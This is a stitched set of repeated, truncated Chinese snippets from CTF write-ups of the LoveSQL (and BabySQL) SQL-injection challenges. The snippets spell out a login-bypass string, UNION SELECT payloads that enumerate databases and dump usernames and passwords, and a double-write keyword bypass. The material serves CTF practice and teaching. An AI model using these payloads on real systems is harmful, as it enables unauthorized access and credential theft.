拿到flag:1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23 成功拿到flag,通关。
作者不建议使用sqlmap我们这里就进行手工注入 用万能口令登录admin ' or 1 =1#,详情见上文(https://www.cnblogs.com/m1saka1/p/18411197) 登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql注入爆破数据库 由于网站自动转义,为了方便观看过程所以这里直接用登录界面演示 admin ...
Payload:admin'+union+select+1,2,3%3b%23。 随后,联合注入一把梭(当然,也可以直接使用 SQLMap)。 查询当前存在什么数据库。 Payload:123456'+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%3b%23。 查询"geek" 数据库中存在什么表。 Payload:123456'+union+select+1,2,group...
拿到flag:1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23 成功拿到flag,通关。
[极客大挑战 2019]LoveSQL 首先打开一个登录界面,用sqlmap是没有灵魂的 测试下是否有注入 查看字段:4报错,说明3个字段 先查询数据库 username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28schema_name%29+from+information_schema.schemata%23 ...
Web类,[极客大挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到最上面那个文字,这是故意提示我们不要有灵魂吗?纠结了一番,先不要灵魂试试? 首先使用万能密码 然后它提示这么一段 sqlmap 一个用来做sql注入攻击的工具,需要的环境是python2 ...
Web类,[极客大挑战 2019]LoveSQL image-20200503094023787 打开题目的实例 image-20200503105208723 思路 看到这个熟悉的界面,看到最上面那个文字,这是故意提示我们不要有灵魂吗?纠结了一番,先不要灵魂试试? 首先使用万能密码 image-20200503110415529 然后它提示这么一段 ...
Web类,[极客大挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到最上面那个文字,这是故意提示我们不要有灵魂吗?纠结了一番,先不要灵魂试试? 首先使用万能密码 然后它提示这么一段 sqlmap 一个用来做sql注入攻击的工具,需要的环境是python2 ...
[极客大挑战 2019]LoveSQL 坚持第八天,又是个SQL注入,这年头这个比较热门吗 1|0前置准备 和上次万能密码那道题一样的界面,上面有一行小字看不清,看看源码 用sqlmap是没有灵魂的,看来这题不能sqlmap,不过我也不会sqlmap呀,就算能用我也用不了,万能密码试一试...
接下来与 "[极客大挑战 2019]LoveSQL" 一致,对数据库进行查询即可。(这里找了一下 SQLMap 的双写绕过 tamper,但是失败了)。 查询当前存在什么数据库。 Payload:admin'+ununionion+seselectlect+1,2,group_concat(schema_name)+frofromm+infoorrmation_schema.schemata%3b%23。 查询"b4bsql" 数据表中存在什么字...